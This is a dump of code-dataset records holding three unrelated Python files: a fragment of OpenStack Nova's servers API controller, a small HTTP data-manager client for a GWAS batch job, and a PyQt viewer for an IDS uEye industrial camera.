raise exc.HTTPBadRequest(explanation=msg)\n except UnicodeDecodeError as error:\n msg = \"UnicodeError: %s\" % error\n raise exc.HTTPBadRequest(explanation=msg)\n except Exception:\n # The remaining cases can be handled in a standard fashion.\n self._handle_create_exception(*sys.exc_info())\n\n # If the caller wanted a reservation_id, return it\n if ret_resv_id:\n return wsgi.ResponseObject({'reservation_id': resv_id})\n\n req.cache_db_instances(instances)\n server = self._view_builder.create(req, instances[0])\n\n if CONF.enable_instance_password:\n server['server']['adminPass'] = password\n\n robj = wsgi.ResponseObject(server)\n\n return self._add_location(robj)\n\n def _delete(self, context, req, instance_uuid):\n instance = self._get_server(context, req, instance_uuid)\n if CONF.reclaim_instance_interval:\n try:\n self.compute_api.soft_delete(context, instance)\n except exception.InstanceInvalidState:\n # Note(yufang521247): instance which has never been active\n # is not allowed to be soft_deleted. Thus we have to call\n # delete() to clean up the instance.\n self.compute_api.delete(context, instance)\n else:\n self.compute_api.delete(context, instance)\n\n def update(self, req, id, body):\n \"\"\"Update server then pass on to version-specific controller.\"\"\"\n if not self.is_valid_body(body, 'server'):\n raise exc.HTTPUnprocessableEntity()\n\n ctxt = req.environ['nova.context']\n update_dict = {}\n\n if 'name' in body['server']:\n name = body['server']['name']\n self._validate_server_name(name)\n update_dict['display_name'] = name.strip()\n\n if 'accessIPv4' in body['server']:\n access_ipv4 = body['server']['accessIPv4']\n if access_ipv4:\n self._validate_access_ipv4(access_ipv4)\n update_dict['access_ip_v4'] = (\n access_ipv4 and access_ipv4.strip() or None)\n\n if 'accessIPv6' in body['server']:\n access_ipv6 = body['server']['accessIPv6']\n if access_ipv6:\n self._validate_access_ipv6(access_ipv6)\n update_dict['access_ip_v6'] = (\n access_ipv6 and access_ipv6.strip() or None)\n\n if 'auto_disk_config' in body['server']:\n auto_disk_config = strutils.bool_from_string(\n body['server']['auto_disk_config'])\n update_dict['auto_disk_config'] = auto_disk_config\n\n if 'hostId' in body['server']:\n msg = _(\"HostId cannot be updated.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n if 'personality' in body['server']:\n msg = _(\"Personality cannot be updated.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n instance = self._get_server(ctxt, req, id, is_detail=True)\n try:\n policy.enforce(ctxt, 'compute:update', instance)\n instance.update(update_dict)\n # Note instance.save can throw a NotFound exception\n instance.save()\n except exception.NotFound:\n msg = _(\"Instance could not be found\")\n raise exc.HTTPNotFound(explanation=msg)\n\n return self._view_builder.show(req, instance)\n\n @wsgi.response(204)\n @wsgi.action('confirmResize')\n def _action_confirm_resize(self, req, id, body):\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id)\n try:\n self.compute_api.confirm_resize(context, instance)\n except exception.MigrationNotFound:\n msg = _(\"Instance has not been resized.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'confirmResize', id)\n\n @wsgi.response(202)\n @wsgi.action('revertResize')\n def 
_action_revert_resize(self, req, id, body):\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id)\n try:\n self.compute_api.revert_resize(context, instance)\n except exception.MigrationNotFound:\n msg = _(\"Instance has not been resized.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.FlavorNotFound:\n msg = _(\"Flavor used by the instance could not be found.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'revertResize', id)\n return webob.Response(status_int=202)\n\n @wsgi.response(202)\n @wsgi.action('reboot')\n def _action_reboot(self, req, id, body):\n if 'reboot' in body and 'type' in body['reboot']:\n if not isinstance(body['reboot']['type'], six.string_types):\n msg = _(\"Argument 'type' for reboot must be a string\")\n LOG.error(msg)\n raise exc.HTTPBadRequest(explanation=msg)\n valid_reboot_types = ['HARD', 'SOFT']\n reboot_type = body['reboot']['type'].upper()\n if not valid_reboot_types.count(reboot_type):\n msg = _(\"Argument 'type' for reboot is not HARD or SOFT\")\n LOG.error(msg)\n raise exc.HTTPBadRequest(explanation=msg)\n else:\n msg = _(\"Missing argument 'type' for reboot\")\n LOG.error(msg)\n raise exc.HTTPBadRequest(explanation=msg)\n\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id)\n\n try:\n self.compute_api.reboot(context, instance, reboot_type)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'reboot', id)\n return webob.Response(status_int=202)\n\n def _resize(self, req, instance_id, flavor_id, **kwargs):\n \"\"\"Begin the resize process with given instance/flavor.\"\"\"\n context = req.environ[\"nova.context\"]\n instance = self._get_server(context, req, instance_id)\n try:\n self.compute_api.resize(context, instance, flavor_id, **kwargs)\n except exception.QuotaError as error:\n raise exc.HTTPForbidden(\n explanation=error.format_message())\n except exception.FlavorNotFound:\n msg = _(\"Unable to locate requested flavor.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.CannotResizeToSameFlavor:\n msg = _(\"Resize requires a flavor change.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.CannotResizeDisk as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'resize', instance_id)\n except exception.ImageNotAuthorized:\n msg = _(\"You are not authorized to access the image \"\n \"the instance was started with.\")\n raise exc.HTTPUnauthorized(explanation=msg)\n except exception.ImageNotFound:\n msg = _(\"Image that the instance was started \"\n \"with could not be found.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except (exception.NoValidHost,\n exception.AutoDiskConfigDisabledByImage) as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n except exception.Invalid:\n msg = _(\"Invalid instance image.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n return webob.Response(status_int=202)\n\n 
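# The pattern in _resize() above holds throughout this controller: compute\n    # exceptions are translated into webob HTTP errors. As an illustrative,\n    # hypothetical call (not part of the original file):\n    #\n    #     controller._resize(req, instance_id, flavor_id)\n    #     # -> 202 on success, 403 on QuotaError, 409 on InstanceIsLocked or\n    #     #    InstanceInvalidState, 400 on FlavorNotFound and similar errors\n\n    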
@wsgi.response(204)\n def delete(self, req, id):\n \"\"\"Destroys a server.\"\"\"\n try:\n self._delete(req.environ['nova.context'], req, id)\n except exception.NotFound:\n msg = _(\"Instance could not be found\")\n raise exc.HTTPNotFound(explanation=msg)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'delete', id)\n\n def _image_ref_from_req_data(self, data):\n try:\n return six.text_type(data['server']['imageRef'])\n except (TypeError, KeyError):\n msg = _(\"Missing imageRef attribute\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n def _image_uuid_from_href(self, image_href):\n if not image_href:\n msg = _(\"Invalid imageRef provided.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n # If the image href was generated by nova api, strip image_href\n # down to an id and use the default glance connection params\n image_uuid = image_href.split('/').pop()\n\n if not uuidutils.is_uuid_like(image_uuid):\n msg = _(\"Invalid imageRef provided.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n return image_uuid\n\n def _image_from_req_data(self, data):\n \"\"\"Get image data from the request or raise appropriate\n exceptions\n\n If no image is supplied - checks to see if there is\n block devices set and proper extesions loaded.\n \"\"\"\n image_ref = data['server'].get('imageRef')\n bdm = data['server'].get('block_device_mapping')\n bdm_v2 = data['server'].get('block_device_mapping_v2')\n\n if (not image_ref and (\n (bdm and self.ext_mgr.is_loaded('os-volumes')) or\n (bdm_v2 and\n self.ext_mgr.is_loaded('os-block-device-mapping-v2-boot')))):\n return ''\n else:\n image_href = self._image_ref_from_req_data(data)\n image_uuid = self._image_uuid_from_href(image_href)\n return image_uuid\n\n def _flavor_id_from_req_data(self, data):\n try:\n flavor_ref = data['server']['flavorRef']\n except (TypeError, KeyError):\n msg = _(\"Missing flavorRef attribute\")\n raise exc.HTTPBadRequest(explanation=msg)\n try:\n return common.get_id_from_href(flavor_ref)\n except ValueError:\n msg = _(\"Invalid flavorRef provided.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n @wsgi.response(202)\n @wsgi.action('changePassword')\n def _action_change_password(self, req, id, body):\n context = req.environ['nova.context']\n if (not body.get('changePassword')\n or 'adminPass' not in body['changePassword']):\n msg = _(\"No adminPass was specified\")\n raise exc.HTTPBadRequest(explanation=msg)\n password = self._get_server_admin_password(body['changePassword'])\n\n server = self._get_server(context, req, id)\n try:\n self.compute_api.set_admin_password(context, server, password)\n except exception.InstancePasswordSetFailed as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as e:\n raise common.raise_http_conflict_for_instance_invalid_state(\n e, 'changePassword', id)\n except NotImplementedError:\n msg = _(\"Unable to set password on instance\")\n raise exc.HTTPNotImplemented(explanation=msg)\n return webob.Response(status_int=202)\n\n def _validate_metadata(self, metadata):\n \"\"\"Ensure that we can work with the metadata given.\"\"\"\n try:\n six.iteritems(metadata)\n except AttributeError:\n msg = _(\"Unable to parse metadata key/value pairs.\")\n LOG.debug(msg)\n raise exc.HTTPBadRequest(explanation=msg)\n\n @wsgi.response(202)\n @wsgi.action('resize')\n def _action_resize(self, req, id, 
body):\n \"\"\"Resizes a given instance to the flavor size requested.\"\"\"\n try:\n flavor_ref = str(body[\"resize\"][\"flavorRef\"])\n if not flavor_ref:\n msg = _(\"Resize request has invalid 'flavorRef' attribute.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except (KeyError, TypeError):\n msg = _(\"Resize requests require 'flavorRef' attribute.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n kwargs = {}\n if 'auto_disk_config' in body['resize']:\n kwargs['auto_disk_config'] = body['resize']['auto_disk_config']\n\n return self._resize(req, id, flavor_ref, **kwargs)\n\n @wsgi.response(202)\n @wsgi.action('rebuild')\n def _action_rebuild(self, req, id, body):\n \"\"\"Rebuild an instance with the given attributes.\"\"\"\n body = body['rebuild']\n\n try:\n image_href = body[\"imageRef\"]\n except (KeyError, TypeError):\n msg = _(\"Could not parse imageRef from request.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n image_href = self._image_uuid_from_href(image_href)\n\n password = self._get_server_admin_password(body)\n\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id)\n\n attr_map = {\n 'personality': 'files_to_inject',\n 'name': 'display_name',\n 'accessIPv4': 'access_ip_v4',\n 'accessIPv6': 'access_ip_v6',\n 'metadata': 'metadata',\n 'auto_disk_config': 'auto_disk_config',\n }\n\n kwargs = {}\n\n # take the preserve_ephemeral value into account only when the\n # corresponding extension is active\n if (self.ext_mgr.is_loaded('os-preserve-ephemeral-rebuild')\n and 'preserve_ephemeral' in body):\n kwargs['preserve_ephemeral'] = strutils.bool_from_string(\n body['preserve_ephemeral'], strict=True)\n\n if 'accessIPv4' in body:\n self._validate_access_ipv4(body['accessIPv4'])\n\n if 'accessIPv6' in body:\n self._validate_access_ipv6(body['accessIPv6'])\n\n if 'name' in body:\n self._validate_server_name(body['name'])\n\n for request_attribute, instance_attribute in attr_map.items():\n try:\n kwargs[instance_attribute] = body[request_attribute]\n except (KeyError, TypeError):\n pass\n\n self._validate_metadata(kwargs.get('metadata', {}))\n\n if 'files_to_inject' in kwargs:\n personality = kwargs.pop('files_to_inject')\n files_to_inject = self._get_injected_files(personality)\n else:\n files_to_inject = None\n\n try:\n self.compute_api.rebuild(context,\n instance,\n image_href,\n password,\n files_to_inject=files_to_inject,\n **kwargs)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'rebuild', id)\n except exception.InstanceNotFound:\n msg = _(\"Instance could not be found\")\n raise exc.HTTPNotFound(explanation=msg)\n except exception.InvalidMetadataSize as error:\n raise exc.HTTPRequestEntityTooLarge(\n explanation=error.format_message())\n except exception.ImageNotFound:\n msg = _(\"Cannot find image for rebuild\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.QuotaError as error:\n raise exc.HTTPForbidden(explanation=error.format_message())\n except (exception.ImageNotActive,\n exception.FlavorDiskTooSmall,\n exception.FlavorMemoryTooSmall,\n exception.InvalidMetadata,\n exception.AutoDiskConfigDisabledByImage) as error:\n raise exc.HTTPBadRequest(explanation=error.format_message())\n\n instance = self._get_server(context, req, id, is_detail=True)\n\n view = self._view_builder.show(req, instance)\n\n # Add on the adminPass attribute since the view 
doesn't do it\n # unless instance passwords are disabled\n if CONF.enable_instance_password:\n view['server']['adminPass'] = password\n\n robj = wsgi.ResponseObject(view)\n return self._add_location(robj)\n\n @wsgi.response(202)\n @wsgi.action('createImage')\n @common.check_snapshots_enabled\n def _action_create_image(self, req, id, body):\n \"\"\"Snapshot a server instance.\"\"\"\n context = req.environ['nova.context']\n entity = body.get(\"createImage\", {})\n\n image_name = entity.get(\"name\")\n\n if not image_name:\n msg = _(\"createImage entity requires name attribute\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n props = {}\n metadata = entity.get('metadata', {})\n common.check_img_metadata_properties_quota(context, metadata)\n try:\n props.update(metadata)\n except ValueError:\n msg = _(\"Invalid metadata\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n instance = self._get_server(context, req, id)\n\n bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(\n context, instance.uuid)\n\n try:\n if self.compute_api.is_volume_backed_instance(context, instance,\n bdms):\n policy.enforce(context,\n 'compute:snapshot_volume_backed',\n {'project_id': context.project_id,\n 'user_id': context.user_id})\n image = self.compute_api.snapshot_volume_backed(\n context,\n instance,\n image_name,\n extra_properties=props)\n else:\n image = self.compute_api.snapshot(context,\n instance,\n image_name,\n extra_properties=props)\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'createImage', id)\n except exception.Invalid as err:\n raise exc.HTTPBadRequest(explanation=err.format_message())\n\n # build location of newly-created image entity\n image_id = str(image['id'])\n url_prefix = self._view_builder._update_glance_link_prefix(\n req.application_url)\n image_ref = common.url_join(url_prefix,\n context.project_id,\n 'images',\n image_id)\n\n resp = webob.Response(status_int=202)\n resp.headers['Location'] = image_ref\n return resp\n\n def _get_server_admin_password(self, server):\n \"\"\"Determine the admin password for a server on creation.\"\"\"\n try:\n password = server['adminPass']\n self._validate_admin_password(password)\n except KeyError:\n password = utils.generate_password()\n except ValueError:\n raise exc.HTTPBadRequest(explanation=_(\"Invalid adminPass\"))\n\n return password\n\n def _validate_admin_password(self, password):\n if not isinstance(password, six.string_types):\n raise ValueError()\n\n def _get_server_search_options(self):\n \"\"\"Return server search options allowed by non-admin.\"\"\"\n return ('reservation_id', 'name', 'status', 'image', 'flavor',\n 'ip', 'changes-since', 'all_tenants')\n\n\ndef create_resource(ext_mgr):\n return wsgi.Resource(Controller(ext_mgr))\n\n\ndef remove_invalid_options(context, search_options, allowed_search_options):\n \"\"\"Remove search options that are not valid for non-admin API/context.\"\"\"\n if context.is_admin:\n # Only remove parameters for sorting and pagination\n for key in ('sort_key', 'sort_dir', 'limit', 'marker'):\n search_options.pop(key, None)\n return\n # Otherwise, strip out all unknown options\n unknown_options = [opt for opt in search_options\n if opt not in allowed_search_options]\n LOG.debug(\"Removing options '%s' from query\",\n \", \".join(unknown_options))\n for opt in unknown_options:\n search_options.pop(opt, 
None)\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/api/openstack/compute/legacy_v2/servers.py","file_name":"servers.py","file_ext":"py","file_size_in_byte":48624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"71068347345","text":"###### GENERAL ######\nimport pandas as pd\nimport time\nfrom ToolBox import compress, decompress\n\n###### HTTP ######\nimport requests\n\n###### LOGGER ######\nfrom ProcessLogger import ProcessLogger\n\nclass DataManager:\n def __init__(self, host=\"0.0.0.0\", port=5000):\n self.__server_url = \"http://\" + host + \":\" + str(port)\n self.__logger = ProcessLogger(\"__DataManager__\")\n\n iterations = 0\n while True:\n if iterations >= 30:\n self.__logger.info(\"Error: Could not connect to host\")\n exit(0)\n\n iterations += 1\n try:\n requests.get(self.__server_url + \"/status\")\n except requests.exceptions.ConnectionError:\n time.sleep(1)\n continue\n else:\n break\n\n\n def get_supplementary_data(self, name):\n iterations = 0\n while iterations < 30:\n iterations += 1\n try:\n r = requests.get(self.__server_url + \"/data\", params={\"name\": name})\n return pd.read_json(\n r.text,\n orient=\"records\"\n )\n except requests.exceptions.ConnectionError:\n time.sleep(1)\n continue\n\n self.__logger.info(\"Error: Could not connect to host\")\n exit(0)\n\n\n def get_batch(self, size):\n iterations = 0\n while iterations < 30:\n iterations += 1\n try:\n r = requests.get(self.__server_url + \"/batch\", params={\"batch_size\": size})\n except requests.exceptions.ConnectionError:\n time.sleep(1)\n continue\n else:\n if r.status_code != 200:\n time.sleep(1)\n continue\n\n data = r.content\n return decompress(data)\n\n self.__logger.info(\"Error: Could not connect to host\")\n exit(0)\n\n def store_result(self, results):\n data = {}\n for key in list(results):\n data[key] = results[key].to_json(orient=\"records\")\n\n compressed = compress(data)\n\n iterations = 0\n while True:\n if iterations >= 60:\n self.__logger.info(\"Error: Could not connect to host\")\n exit(0)\n iterations += 1\n try:\n r = requests.post(self.__server_url + \"/result\", data=compressed)\n except requests.exceptions.ConnectionError:\n time.sleep(1)\n continue\n else:\n # Keep trying to post results until server accepts\n if r.status_code != 200:\n time.sleep(1)\n continue\n else:\n return\n\n\n","repo_name":"dakie14/HPC_GWAS","sub_path":"DataManager.py","file_name":"DataManager.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11127094634","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Yu-Sheng Lin\"\n__copyright__ = \"Copyright (C) 2016-2022\"\n__license__ = \"AGPL\"\n__email__ = \"pyquino@gmail.com\"\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.uic import loadUi\nfrom PyQt5.QtCore import pyqtSlot\nfrom ids_peak import ids_peak\n\nimport platform\nimport numpy as np\nimport math\nimport time\nimport cv2\nimport os\nimport datetime\nimport ctypes\nimport struct\n\n# check for install the ids camera sdk\ntry:\n from pyueye import ueye\nexcept ImportError:\n print(\"Do not install pyueye\")\n print(\"Please use 'pip install pyueye' to install modules\")\n\n\nclass Thread_show_image(QThread):\n send_image = pyqtSignal(QPixmap)\n\n def __init__(self, hcam, width, height, sInfo, nBitsPerPixel, parent=None):\n 
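# Worker thread for live view: it allocates a single uEye image buffer,\n        # switches the camera into continuous capture, converts each frame event\n        # into a half-scale QPixmap and emits it on send_image; while flag_save\n        # is set (see continue_save_img) frames are also buffered and written out.\n        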
QThread.__init__(self, parent)\n self.hCam = hcam\n self.width = width\n self.height = height\n self.sInfo = sInfo\n self.nBitsPerPixel = nBitsPerPixel\n self.pcImageMemory = ueye.c_mem_p()\n self.MemID = ueye.int()\n self.pitch = ueye.INT()\n self.stop_thread = False\n self.flag_save = False\n\n init_events = ueye.IS_INIT_EVENT()\n init_events.nEvent = ueye.IS_SET_EVENT_FRAME\n init_events.bManualReset = False\n init_events.bInitialState = False\n ueye.is_Event(self.hCam, ueye.IS_EVENT_CMD_INIT, init_events, ueye.sizeof(init_events))\n\n events = ueye.c_uint(ueye.IS_SET_EVENT_FRAME)\n ueye.is_Event(self.hCam, ueye.IS_EVENT_CMD_ENABLE, events, ueye.sizeof(events))\n\n self.wait_events = ueye.IS_WAIT_EVENT()\n self.wait_events.nEvent = ueye.IS_SET_EVENT_FRAME\n self.wait_events.nCount = 2\n self.wait_events.nTimeoutMilliseconds = 1000\n self.wait_events.nSignaled = 0\n self.wait_events.nSetCount = 0\n self.bytes_per_pixel = int(nBitsPerPixel / 8)\n\n nRet = ueye.is_AllocImageMem(self.hCam, width, height, nBitsPerPixel, self.pcImageMemory, self.MemID)\n\n if nRet != ueye.IS_SUCCESS:\n print(\"is_AllocImageMem ERROR\")\n else:\n # Makes the specified image memory the active memory\n nRet = ueye.is_SetImageMem(self.hCam, self.pcImageMemory, self.MemID)\n if nRet != ueye.IS_SUCCESS:\n print(\"is_SetImageMem ERROR\")\n else:\n # Set the desired color mode\n nRet = ueye.is_SetColorMode(self.hCam, ueye.int(0))\n\n nRet = ueye.is_CaptureVideo(self.hCam, ueye.IS_DONT_WAIT)\n if nRet != ueye.IS_SUCCESS:\n print(\"is_CaptureVideo ERROR\")\n\n nRet = ueye.is_InquireImageMem(self.hCam, self.pcImageMemory, self.MemID, width, height, nBitsPerPixel, self.pitch)\n if nRet != ueye.IS_SUCCESS:\n print(\"is_InquireImageMem ERROR\")\n\n def continue_save_img(self):\n self.tmp = []\n self.flag_save = True\n self.max_img = 5\n\n def save_img(self):\n for i in range(len(self.tmp)):\n cv2.imwrite(f\"{i}.jpg\", self.tmp[i])\n\n def run(self):\n\n while True:\n ret = ueye.is_Event(self.hCam, ueye.IS_EVENT_CMD_WAIT, self.wait_events, ueye.sizeof(self.wait_events))\n if (ueye.IS_SET_EVENT_FRAME == self.wait_events.nSignaled):\n array = ueye.get_data(self.pcImageMemory, self.width, self.height, self.nBitsPerPixel, self.pitch, copy=False)\n frame = np.reshape(array, (self.height.value, self.width.value, self.bytes_per_pixel))\n # print((self.height.value, self.width.value, self.bytes_per_pixel))\n qImg = QImage(frame, self.width.value, self.height.value, QImage.Format_RGB888)\n qImg = qImg.scaled(int(self.width.value / 2), int(self.height.value / 2))\n qpxmp = QPixmap.fromImage(qImg)\n if self.flag_save:\n self.tmp.append(frame)\n if len(self.tmp) > self.max_img:\n self.flag_save = False\n self.save_img()\n self.send_image.emit(qpxmp)\n if self.stop_thread:\n break\n self.wait(200)\n\n def stop_thr(self):\n self.stop_thread = True\n # Ret = ueye.is_FreeImageMem(self.hCam, self.pcImageMemory, self.MemID)\n\n\nclass Thread_count(QThread):\n test_signal = pyqtSignal(QPixmap)\n\n def __init__(self, hcam, width, height, sInfo, m_vpcSeqImgMem, bufeersize, nBitsPerPixel, parent=None):\n QThread.__init__(self, parent)\n self.hCam = hcam\n self.width = width\n self.height = height\n self.sInfo = sInfo\n self.m_vpcSeqImgMem = m_vpcSeqImgMem\n self.bufeersize = bufeersize\n self.nBitsPerPixel = nBitsPerPixel\n self.pitch = ueye.INT()\n\n def run(self):\n width = self.sInfo.nMaxWidth\n height = self.sInfo.nMaxHeight\n # create an event of camera\n ueye.is_EnableEvent(self.hCam, ueye.IS_SET_EVENT_FRAME)\n # 
ueye.is_FreezeVideo(self.hCam, ueye.IS_DONT_WAIT)\n count = 0\n # count the frame ret\n if platform.system() == \"Windows\":\n try:\n import win32event\n import ctypes\n hEvent = win32event.CreateEvent(None, False, False, None)\n hEvent_FL = int(hEvent)\n pEvent_FL = ueye.c_void_p(hEvent_FL)\n # hEvent = ueye.c_void_p()\n ueye.is_InitEvent(self.hCam, pEvent_FL, ueye.IS_SET_EVENT_FRAME)\n except ImportError:\n print(\"error\")\n\n while True:\n iImageID = ueye.c_int(0)\n pBuffer = ueye.c_mem_p()\n\n if platform.system() == \"Linux\":\n nRet = ueye.is_WaitEvent(self.hCam, ueye.IS_SET_EVENT_FRAME, 1000)\n elif platform.system() == \"Windows\":\n nRet = None\n\n dwRet = ctypes.windll.kernel32.WaitForSingleObject(pEvent_FL, 1000)\n\n # TODO: need to check how to use event\n if nRet == ueye.IS_SUCCESS or dwRet == win32event.WAIT_OBJECT_0:\n\n self.array = ueye.get_data(self.m_vpcSeqImgMem[count - 1], self.width, self.height,\n 24, 12312, copy=False)\n frame = np.reshape(self.array, (self.height.value, self.width.value, 3))\n # ...resize the image by a half\n qImg = QImage(frame, self.width.value, self.height.value, QImage.Format_RGB888) # Format_Grayscale8\n # qImg = qImg.scaled(int(self.width.value / 2), int(self.height.value / 2))\n qpxmp = QPixmap.fromImage(qImg)\n self.test_signal.emit(qpxmp)\n ueye.is_UnlockSeqBuf(self.hCam, iImageID, pBuffer)\n count = count + 1\n\n if platform.system() == \"Windows\":\n if dwRet == win32event.WAIT_TIMEOUT: # win32event.WAIT_FAILED\n print(\"timeout in windows\")\n break\n elif platform.system() == \"Linux\":\n if nRet != ueye.IS_SUCCESS:\n print(f\"error code {nRet}\")\n break\n\n if count >= self.bufeersize:\n print(f\"this is test {len(self.m_vpcSeqImgMem)}\")\n # ueye.is_FreezeVideo(self.hCam, ueye.IS_WAIT)\n ueye.is_FreezeVideo(self.hCam, ueye.IS_DONT_WAIT)\n break\n # i = i + 1\n ueye.is_DisableEvent(self.hCam, ueye.IS_SET_EVENT_FRAME)\n if platform.system() == \"Windows\" and pEvent_FL != None:\n ueye.is_ExitEvent(self.hCam, ueye.IS_SET_EVENT_FRAME)\n # import win32api\n # win32api.CloseHandle(hEvent)\n ctypes.windll.Kernel32.CloseHandle(pEvent_FL)\n\n\nclass MainWindow(QMainWindow):\n\n signal1 = pyqtSignal()\n\n def __init__(self, parent = None):\n super(MainWindow, self).__init__()\n loadUi(\"core/mainwindow.ui\", self)\n # self.__init_setting()\n # self._add_action()\n self.show()\n\n self._init_ids_camera(0)\n nRet = ueye.is_InitCamera(self.hCam, None)\n if nRet == 3:\n print(\"Do not find the camera\")\n print(\"Please insert the cable to the computer\")\n exit()\n\n self.liveframe = None\n self.bufeersize = None\n # ueye.is_SetColorMode(self.hCam, ueye.IS_CM_RGB8_PACKED)\n self.m_viSeqMemID = []\n self.m_vpcSeqImgMem = []\n # self.signal1.connect(self.update_image)\n\n # self.image_thread = Thread_show_image(self.hCam, self.width, self.height, self.sInfo, self.nBitsPerPixel)\n # self.image_thread.start()\n # self.image_thread.send_image.connect(self.update_image)\n\n def _init_ids_camera(self, camera_ids):\n self.hCam = ueye.HIDS(camera_ids) # 0: first available camera; 1-254: The camera with the specified camera ID\n self.sInfo = ueye.SENSORINFO()\n self.cInfo = ueye.CAMINFO()\n self.pcImageMemory = ueye.c_mem_p()\n self.MemID = ueye.int()\n self.rectAOI = ueye.IS_RECT()\n self.width = ueye.int(4104) # 相機解析度\n self.height = ueye.int(2174) # 相機解析度\n self.pitch = ueye.INT()\n self.nBitsPerPixel = ueye.INT(32) # 24: bits per pixel for color mode; take 8 bits per pixel for monochrome\n channels = 3 # 3: channels for color mode(RGB); take 1 
channel for monochrome\n self.m_nColorMode = ueye.INT(0) # Y8/RGB16/RGB24/REG32\n self.bytes_per_pixel = int(self.nBitsPerPixel / 8)\n self.m_buffer_init = 0\n self.fps_second = ueye.DOUBLE()\n self.exposure_time_max = ueye.DOUBLE()\n self.exposure_time_min = ueye.DOUBLE()\n self.gainFactor = ueye.DOUBLE()\n self.maxFrame = ueye.DOUBLE()\n self.miniFrame = ueye.DOUBLE()\n self.intervallFrame = ueye.DOUBLE()\n\n def camSeqBuild(self):\n bRet = False\n FrameTimeMin = ueye.c_double()\n FrameTimeMax = ueye.c_double()\n FrameTimeIntervall = ueye.c_double()\n nRet = ueye.is_GetFrameTimeRange(self.hCam, FrameTimeMin, FrameTimeMax, FrameTimeIntervall)\n # nRet = 0\n if nRet == ueye.IS_SUCCESS:\n # print(FrameTimeMin)\n maxBuffer = (1 / FrameTimeMin) + 0.5\n # print(maxBuffer)\n if maxBuffer < 3:\n nmaxbuffer = 3\n else:\n nmaxbuffer = self.bufeersize\n\n imageSize = ueye.IS_RECT()\n nRet = ueye.is_AOI(self.hCam, ueye.IS_AOI_IMAGE_GET_AOI, imageSize, ueye.sizeof(imageSize))\n self.width = imageSize.s32Width\n self.height = imageSize.s32Height\n\n # allocate buffer (memory) in a for-loop\n for i in range(0, nmaxbuffer):\n\n iImageID = ueye.c_int(0)\n pcImhMem = ueye.c_mem_p()\n\n nRet = ueye.is_AllocImageMem(self.hCam, self.width, self.height, self.nBitsPerPixel, pcImhMem, iImageID)\n if nRet != ueye.IS_SUCCESS:\n break\n nRet = ueye.is_AddToSequence(self.hCam, pcImhMem, iImageID)\n if nRet != ueye.IS_SUCCESS:\n ueye.is_FreeImageMem(self.hCam, pcImhMem, iImageID)\n break\n\n self.m_viSeqMemID.append(iImageID)\n self.m_vpcSeqImgMem.append(pcImhMem)\n\n # nRet = ueye.is_InitImageQueue(hCam, 0)\n if nRet == ueye.IS_SUCCESS:\n bRet = True\n else:\n bRet = False\n return bRet\n\n @pyqtSlot()\n def on_testbtn_clicked(self):\n print(123)\n self.image_thread.continue_save_img()\n # self.all_process()\n\n @pyqtSlot()\n def on_openlive_clicked(self):\n print(\"open live mode\")\n self.image_thread = Thread_show_image(self.hCam, self.width, self.height, self.sInfo, self.nBitsPerPixel)\n self.image_thread.start()\n self.image_thread.send_image.connect(self.update_image)\n\n @pyqtSlot()\n def on_close_live_clicked(self):\n print(\"close the live mode\")\n self.image_thread.stop_thr()\n self.image_thread.exec_()\n ueye.is_ExitCamera(self.hCam)\n\n def all_process(self):\n \"\"\"This function connect all process\"\"\"\n pass\n # # Build Camera Sequence\n # self.bufeersize = 100 # self.number_of_shots.value()\n # bRet = self.camSeqBuild()\n #\n # if bRet is True:\n # 